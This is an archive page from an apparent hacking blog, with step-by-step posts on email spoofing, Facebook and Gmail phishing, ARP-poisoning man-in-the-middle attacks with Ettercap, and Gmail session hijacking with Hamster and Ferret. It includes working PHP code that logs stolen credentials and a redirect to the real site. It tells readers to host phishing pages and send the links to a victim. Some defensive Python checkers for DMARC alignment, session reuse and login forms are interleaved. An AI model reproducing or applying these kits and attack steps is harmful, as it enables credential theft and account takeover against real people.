Showing posts with the label Email and Facebook Hacking.

Email spoofing

Email spoofing is the creation of email messages with a forged sender address - something which is simple to do because the core SMTP protocols do no authentication. Spam and phishing emails typically use such spoofing to mislead the recipient about the origin of the message.
A number of measures to address spoofing are available, including SPF, Sender ID, DKIM, and DMARC. Although their use is increasing, it is likely that almost half of all domains still do not have such measures in place.
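How a receiver uses those measures to catch a forged sender, as an added example that is not part of the original post: the sketch reads the Authentication-Results header added by the receiving mail server and applies a relaxed DMARC-style alignment test against the From: domain. The sample messages, host names and the two-label organizational-domain rule are constructed assumptions.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: From: claims example-bank.test, but the only "pass" is
# SPF for an unrelated envelope domain, so nothing aligns with From:.
SPOOFED = """\
Authentication-Results: mx.receiver.test;
 spf=pass smtp.mailfrom=bulk.sender.test;
 dkim=fail header.d=example-bank.test
From: "Bill Gates" <bill@example-bank.test>
Subject: hello

body
"""
# Constructed sample: SPF and DKIM both pass for the From: domain.
LEGIT = """\
Authentication-Results: mx.receiver.test;
 spf=pass smtp.mailfrom=bounce.example-bank.test;
 dkim=pass header.d=example-bank.test
From: Support <support@example-bank.test>
Subject: statement

body
"""

def org_domain(domain):
    """Simplified organizational domain: last two labels (assumption;
    real implementations consult the Public Suffix List)."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])

def auth_results(msg):
    """Return {method: (result, authenticated_domain)} for SPF and DKIM."""
    header = " ".join(" ".join(msg.get_all("Authentication-Results", [])).split())
    found = {}
    for method, prop in (("spf", "smtp.mailfrom"), ("dkim", "header.d")):
        m = re.search(rf"\b{method}=(\w+)[^;]*?{re.escape(prop)}=([^\s;]+)", header)
        if m:
            found[method] = (m.group(1).lower(), m.group(2).split("@")[-1])
    return found

def dmarc_aligned(raw):
    """True only if SPF or DKIM passed for a domain aligned with From:."""
    msg = message_from_string(raw)
    from_dom = parseaddr(msg.get("From", ""))[1].rpartition("@")[2]
    for result, domain in auth_results(msg).values():
        if result == "pass" and org_domain(domain) == org_domain(from_dom):
            return True
    return False
```

The spoofed sample shows why a bare SPF pass is not enough: the sender passed SPF for its own domain, and only the alignment test ties the result back to the address the recipient sees.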


First of all, download the EmailSpoofer.php file.

    Upload the files to any free web hosting server. Some free web hosting servers are given below; you can also find a few more for yourself.
  • http://www.serversfree.com/
  • http://www.yourfreehosting.net/ 
  • http://www.esmartstart.com/ 
  • http://www.110mb.com/ 
  • http://www.drivehq.com/ 
  • http://www.t35.com/
  • http://www.my3gb.com/
Then click on the EmailSpoofer.php file and you get the fake mail sender application.



fake mail from bill gates



warning
------------------------------------------------------------------------------------------------------------------------
You may use this script for educational purposes only.
I cannot be held responsible for any legal action or other action taken against you because of use of this script.
Use at your own risk.

no one is untraceable
------------------------------------------------------------------------------------------------------------------------



~ Tuesday 11 June 2013 0 comments

Web Browser Pass View(email hacking)


~ Monday 24 December 2012 0 comments

Email hacking using metasploit (remotely)


Demo of Email hacking using metasploit (remotely) on www.youtube.com
--------------------------------------------------------------------------
https://www.youtube.com/watch?v=PsHVg_-LCrc
--------------------------------------------------------------------------

~ Monday 10 December 2012 0 comments

MITM with Ettercap

Hello readers, we are back with our tutorials on Matriux, due to some unwanted circumstances we weren’t able to be a part of last month’s issue. However we promise to provide our continued support and help to the users. This month we are going to cover a basic tutorial of Man-In-The-Middle (MITM) attack using Ettercap by ARP spoofing technique.

Ettercap 
-----------------------------------------------------------------------------------------
Ettercap is a great tool, especially for Man-In-The-Middle attacks. It is a simple, easy-to-use tool for intercepting data over a LAN and on systems connected through switched routers, and for executing MITM attacks.
“Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis.” – quoted from Ettercap Website.

----------------------------------------------------------------------------------------------

MITM with Ettercap by ARP poisoning

 ----------------------------------------------------------------------------------------
Requirement: Target system to be in the same network as our attacker – Matriux (can be used over systems communicating over routers too). But let’s make it easy ;)

Ettercap can be found in Matriux under Arsenal > Scanning >Ettercap. I prefer we use the console mode for better understanding of the attack procedure.
----------------------------------------------------------------------------------------------

Attack Setup
-----------------------------------------------------------------------------------------
1. Enable IP Forwarding by typing the following in terminal.

2. Edit the file /etc/etter.conf (it may be at a different location in other versions; try “locate etter.conf”). Uncomment the following lines by removing the “#” where they are present.
3. Open another terminal and type “driftnet –i<>”, using the interface by which you are able to communicate with the target system (in my case it was eth1). You will be able to see a black window coming up.


Initiating the Attack

Open the terminal as root and start the attack by typing: 
--------------------------------------------------------------------
~#ettercap –Tq –M arp:remote /<>/
--------------------------------------------------------------------


IP of target can be a group of IP addresses.

Now you can see the data, passwords and everything being browsed or passed over the internet from the target in the window, and also the images the target is browsing in the driftnet window we opened up earlier.


Now you have successfully performed a MITM attack using Ettercap by ARP spoofing. You can also try changing the data the target system is communicating with the internet.


~ Sunday 30 September 2012 0 comments

How to Hack Facebook Account (Phishing)

       First of all download the Facebook Phishing Page.  Extract the zip file now you will get two files as given below:
  • code.php
  • index.php
       Upload the two files to any free web hosting server. Some free web hosting servers are given below; you can also find a few more for yourself.
  • http://www.serversfree.com/
  • http://www.yourfreehosting.net/ 
  • http://www.esmartstart.com/ 
  • http://www.110mb.com/ 
  • http://www.drivehq.com/ 
  • http://www.t35.com/
  • http://www.my3gb.com/


       Once you have uploaded the two files to the web hosting server, you have to send the link of the index.php file to your victim.
       After the Phisher has been sent, the victim gets the fake Facebook page. Once the user logs in to his Facebook account using your Phisher, his user ID and password are ours... These are stored in logs.txt; all you have to do is refresh your web hosting account files.


Game is Over


~ Monday 7 May 2012 0 comments

man-in-the-middle attacks



Introduction

 As we have demonstrated with those examples, MITM attacks are incredibly effective and increasingly hard to detect. In the third part of this article we will examine session hijacking, which is no different. As with the previous two articles I will describe the theory behind session hijacking, demonstrate the technique in practice, and discuss detection and prevention tips.

Session Hijacking

The term session hijacking is thrown around frequently and encompasses a variety of different attacks. In general, any attack that involves the exploitation of a session between devices is session hijacking. When we refer to a session, we are talking about a connection between devices in which there is state. That is, there is an established dialogue in which a connection has been formally set up, the connection is maintained, and a defined process must be used to terminate the connection. When we talk about sessions theoretically it’s a bit confusing, so it may help to think of a session in a more practical sense.
In this article we will be talking about session hijacking through cookie stealing, which involves HTTP sessions. If you think about some of the common websites you visit that require login credentials, those are great examples of session-oriented connections. You must be authenticated by the website with your username and password to formally set up the session, the website maintains some form of session tracking to ensure you are still logged in and are allowed to access resources (often done with a cookie), and when the session is ending the credentials are cleared and the session ends. This is a very specific example of a session and even though we do not always realize it, sessions are occurring constantly and most communications rely on some form of session or state-based activity.




  Figure 1: A normal session

As we have seen in previous attacks, nothing that goes across the network is safe and session data is no different. The principle behind most forms of session hijacking is that if you can intercept certain portions of the session establishment, you can use that data to impersonate one of the parties involved in the communication so that you may access session information. In the case of our earlier example, this means that if we were to capture the cookie that is used to maintain the session state between your browser and the website you are logging into, we could present that cookie to the web server and impersonate your connection. If that sounds too good to be true from an attacker’s standpoint, well… it is.

 

Figure 2: Session Hijacking

Now that we have a little bit of theory in the books, let us delve into a practical example.

Stealing Cookies with Hamster and Ferret

In our practical scenario we will be performing a session hijacking attack by intercepting the communication of a user logging into his Gmail account. Using this intercepted communication we will impersonate that user and access the account from our attacking machine.
In order to perform this attack we will be using two tools straight out of the pet store, named Hamster and Ferret. Both tools can be downloaded from here. These are both command-line tools so the hamster folder can be extracted to an easy to get to location.
Alternatively, you can download and use Backtrack 4. BT4 is a Linux live-CD distribution designed specifically for hacking and penetration testing that comes with a myriad of preinstalled and precompiled tools, with Hamster/Ferret being two of them. You can download BT4 from here. You will then find Hamster in the /pentest/sniffers/hamster folder. The screenshot examples used in the rest of this tutorial are taken from BT4.
The first step involved in this form of session hijacking is to capture the traffic of the victim user as he browses Facebook. This traffic can actually be captured using any packet sniffing application such as TCPDump or Wireshark, but in order to capture the right packets you will need to employ a technique such as ARP cache poisoning (discussed in the first article in this series). 

Figure 3: Capturing traffic of the user browsing to Gmail

Once you have captured the traffic of the victim user browsing to Gmail you will need to save the captured file into the Hamster directory. For the purposes of this example, we have named our file victim_gmail.pcap. When that file is in place, we will use Ferret to process the file. This is done by browsing to the Hamster folder and running the command, ferret –r victim_gmail.pcap. Ferret will process the file and create a hamster.txt file that may be used by Hamster for the actual hijacking of the session.
 
Figure 4: Processing the capture file with Ferret

With our HTTP data intercepted and prepared for use, we can use Hamster to actually execute the attack. Hamster itself actually runs as a proxy that provides an interface for browsing and using stolen session cookies. In order to start the Hamster proxy you can simply execute Hamster with no command line options.
 

 Figure 5: Starting Hamster

Once executed, you will need to open your browser and configure its proxy settings to match those provided to you by the Hamster output. By default, this means that you would configure your proxy settings to use the local loop-back address 127.0.0.1 on port 1234. You can access these settings in Internet Explorer by selecting Tools, Internet Options, Connections, LAN Settings, and placing a check box in the Use a proxy server for your LAN box.

 Figure 6: Configuring proxy settings for use with Hamster

Now that the proxy settings have been applied you can access the Hamster console in your browser by browsing to http://hamster. Hamster will use the file created by Ferret to produce a list of IP addresses for which session information has been intercepted and display those IP addresses in the right pane of the browser. The file we’ve created only contains a single IP address, that of the victim, so if we click it the left pane will be populated with the sessions available for hijacking.


  
 Figure 7: The Hamster GUI

We see that Gmail.com is listed, and if you click that link you will be pleased to be presented with a new window that has you logged in to the victim’s Gmail account!

   Figure 8: Successfully hijacked Gmail account!

Defending Against Session Hijacking

There are many different forms of session hijacking so the defenses for them can vary. Just like the other MITM attacks we’ve evaluated, session hijacking is difficult to detect and even more difficult to defend against because it’s a mostly passive attack. Unless the malicious user performs some type of obvious action when he accesses the session being hijacked, you may never know that they were there. Here are a few things you can do to better defend against session hijacking:

  • Save Online Banking for Home - The chance of somebody intercepting your traffic on your home network is much less than on your work network. This isn’t because your home computer is more secure (let’s face it, it’s probably less secure), but the simple matter of fact is that if you only have one or two computers at home, the most you have to worry about in terms of session hijacking is if your 14 year old son starts watching hacking videos on YouTube. On a corporate network you don’t know what is going on down the hall or in the branch office 200 miles away, so the potential attack sources multiply. One of the biggest targets for session hijacking is online banking, but this principle applies to anything.
  • Be Cognizant - Smart attackers will not leave any evidence that they have been in one of your secure accounts but even the most seasoned hackers make mistakes. Being aware when you are logged into session-based services can help you determine if somebody else is walking in your shadow. Keep an eye out for things that seem out of place, and pay attention to “Last Logon Time” fields to ensure everything matches up.
  • Secure your internal machines - Once again, attacks like these are most commonly executed from inside the network. If your network devices are secure then there is less of a chance of those compromised hosts being used to launch a session hijacking attack.
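The "Be Cognizant" advice can also be applied on the server side. As an added example that is not part of the original article, the function below scans access records for a session cookie presented by more than one client address or User-Agent, which is how a replayed cookie appears to the site. The log format, field names and values are constructed assumptions.

```python
import hashlib
import re
from collections import defaultdict

# Constructed access-log lines: client IP, timestamp, request, User-Agent and
# the session cookie value as an application might log it (assumed format).
LOG = '''\
10.0.0.15 [10/Jan/2012:09:00:01] "GET /mail HTTP/1.1" "Firefox/9.0" sid=4f2a9c
10.0.0.15 [10/Jan/2012:09:00:07] "GET /mail/inbox HTTP/1.1" "Firefox/9.0" sid=4f2a9c
10.0.0.22 [10/Jan/2012:09:01:30] "GET /mail HTTP/1.1" "Chrome/16.0" sid=77b1e0
10.0.0.99 [10/Jan/2012:09:03:12] "GET /mail/inbox HTTP/1.1" "MSIE 8.0" sid=4f2a9c
10.0.0.22 [10/Jan/2012:09:04:00] "GET /mail/inbox HTTP/1.1" "Chrome/16.0" sid=77b1e0
'''

LINE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" "(?P<ua>[^"]*)" sid=(?P<sid>\S+)$'
)

def fingerprint(sid):
    """Report a hash of the token, never the token itself."""
    return hashlib.sha256(sid.encode()).hexdigest()[:12]

def shared_sessions(log_text):
    """Return {token fingerprint: [(ip, user_agent, first_seen), ...]} for
    sessions presented by more than one (IP, User-Agent) pair."""
    seen = defaultdict(dict)  # sid -> {(ip, ua): first timestamp}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        seen[m["sid"]].setdefault((m["ip"], m["ua"]), m["ts"])
    report = {}
    for sid, clients in seen.items():
        if len(clients) > 1:
            report[fingerprint(sid)] = [
                (ip, ua, ts) for (ip, ua), ts in clients.items()
            ]
    return report
```

Users who roam between networks will also trip this check, so treat a hit as a reason to re-authenticate the session rather than as proof of hijacking.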




~ Tuesday 10 January 2012 0 comments

Email Hacking ( Phishing Attack)

Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive an e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends them to the hacker’s email or stores them on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and PHP programming. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. Seeing the steps a hacker would take will help you defend against such an attack.

  • First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.
  • After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox (highly recommend using this browser for its security and customization). So I would go to www.gmail.com and click File -> Save page as… , or simply hit + S  which does this automatically. Choose where you would like to save the web page and hit Save.


  • Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
  • Next the hacker would create a PHP script to do his dirty deed of stealing your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.
// This marks the beginning of the PHP script.
Header(“Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmai%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=default<mplcache=2 “); // once you click “Sign in” in the fake website, this redirects you to the real Gmail website, making the whole process look more legit.
$handle = fopen(“list.txt”, “a”); // this tells the server to open the file “list.txt” and get it ready for appending data. Which in this case is your username and password.
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
// This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file “list.txt”
exit;
?> // Marks the end of the PHP program.

So far you should see the following in your folder:

  • Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.
  • Hit + F , or go to Edit -> Find , type in action and hit “Find Next”.

  • This will highlight the first occurrence of the word “action” in the script and you should see the following:
 
 There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:
Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.
  • Save and close the file.
  • Next the hacker would upload the files up to a free webhost that supports PHP(http://www.my3gb.com/). With a simple Google search you can come up with a bunch that fall under this category.
  • Once all the files are uploaded, you must give writing permissions to the “list.txt” file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for “list.txt” to 777. If you can’t figure out how to do this, ask people that use the same host or simply Google something similar to: “yourwebhostname chmod”.
  • Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.
  • Now go take a look at your list.txt file by going through your hosting file manager or going to http://www.yourwebhosturl.com/youraccount/list.txt. Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of “myusername” and a password of “mypassword” then “list.txt” would now look like the following
As you can see if you fell for this the hacker would have your email and password. Scary, eh?
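The two edits this walkthrough describes, a login form whose action points at a local script and whose method is switched to GET, are what a page scanner can look for; the same applies to the Facebook copy described earlier on this page. The following is an added example, not part of the original post: it flags any form containing a password field that submits with GET, to an unexpected host, or without HTTPS. The sample HTML, host names and function names are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class LoginFormAudit(HTMLParser):
    """Collect action, method and password-field presence for each <form>."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._cur = {"action": a.get("action", ""),
                         "method": a.get("method", "get").lower(),
                         "password": False}
        elif tag == "input" and self._cur is not None:
            if a.get("type", "").lower() == "password":
                self._cur["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._cur is not None:
            self.forms.append(self._cur)
            self._cur = None

def audit_login_forms(html, page_url, expected_host):
    """Return findings for password forms that leak or misdirect credentials."""
    parser = LoginFormAudit()
    parser.feed(html)
    parser.close()
    findings = []
    for form in parser.forms:
        if not form["password"]:
            continue  # only forms that collect a password matter here
        target = urlparse(urljoin(page_url, form["action"]))
        if form["method"] != "post":
            findings.append(("password-sent-with-get", target.geturl()))
        if target.hostname != expected_host:
            findings.append(("posts-to-unexpected-host", target.geturl()))
        if target.scheme != "https":
            findings.append(("not-https", target.geturl()))
    return findings

# Constructed samples: a genuine-looking login form and a modified copy that
# also contains a second, harmless form with its own "action".
GENUINE = '''<form id="login" action="https://accounts.example.test/ServiceLoginAuth" method="post">
<input type="text" name="Email"><input type="password" name="Passwd"></form>'''
CLONE = '''<form id="search" action="/search" method="get"><input type="text" name="q"></form>
<form id="login" action="phish.php" method="GET">
<input type="text" name="Email"><input type="password" name="Passwd"></form>'''
```

A password submitted with GET also ends up in the URL, so it is recorded in browser history, proxy logs and web server access logs, which gives responders another place to look.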


~ Tuesday 6 December 2011 0 comments